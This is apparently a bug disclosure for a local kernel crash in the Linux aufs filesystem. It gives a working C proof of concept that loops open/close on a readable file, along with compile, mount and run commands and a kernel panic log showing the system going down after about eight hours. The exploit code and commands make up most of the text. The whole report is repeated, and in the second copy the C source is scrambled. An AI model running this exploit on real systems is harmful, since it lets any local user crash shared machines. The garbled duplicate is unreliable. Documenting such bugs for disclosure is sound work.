The local exploit is trivial as 'mount | grep aufs' says
whether there's an aufs mountpoint, and usually there is
a file that is 'chmod o+r' that any user could read/open.
(This crashed a virtual machine in 8 hours, overnight.)
See section 'Exploit / Local' below.
Code:
$ cat <<EOF >exploit.c
#include <fcntl.h>
#include <unistd.h>
int main() { while (!close(open("test", O_RDONLY))); return 0; }
EOF
$ gcc -o /tmp/exploit exploit.c
Setup:
$ mkdir dir mnt
$ touch dir/test
$ sudo mount -t aufs -o br=dir none mnt
$ ls mnt
test
Run:
$ cd mnt && /tmp/exploit
<just let it run until..>
Exploit / Local:
---
The local exploit is trivial as 'mount | grep aufs' says
whether there's an aufs mountpoint, and usually there is
a file that is 'chmod o+r' that any user could read/open.
(This crashed a virtual machine in 8 hours, overnight.)
See section 'Exploit / Local' below.
Code:
$ cat <<EOF >exploit.c open("test" , O_RDONLY))); return 0; }
#include <fcntl.h>
#include <unistd.h>
int main() { while (!close(
EOF
$ gcc -o /tmp/exploit exploit.c
Setup:
$ mkdir dir mnt
$ touch dir/test
$ sudo mount -t aufs -o br=dir none mnt
$ ls mnt
test
Run:
$ cd mnt && /tmp/exploit
<just let it run until..>
[29167.866016] kernel BUG at include/ linux/fs. h:2963! fput+0x25d/ 0x260 run+0x8f/ 0xb0 usermode_ loop+0x131/ 0x160 64+0x163/ 0x190 64_after_ hwframe+ 0x44/0xa9
[29167.867423] invalid opcode: 0000 [#1] SMP PTI
[29167.868584] CPU: 0 PID: 5314 Comm: exploit Tainted: G OE 5.4.0-21-generic #25-Ubuntu
[29167.870751] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.12.0-1 04/01/2014
[29167.873202] RIP: 0010:__
...
[29167.901583] Call Trace:
[29167.902387] ____fput+0xe/0x10
[29167.903344] task_work_
[29167.904420] exit_to_
[29167.905749] do_syscall_
[29167.906929] entry_SYSCALL_
...
[29167.967808] Kernel panic - not syncing: Fatal exception
(uptime = 29167 seconds / 3600 seconds/hour = 8.10 hours)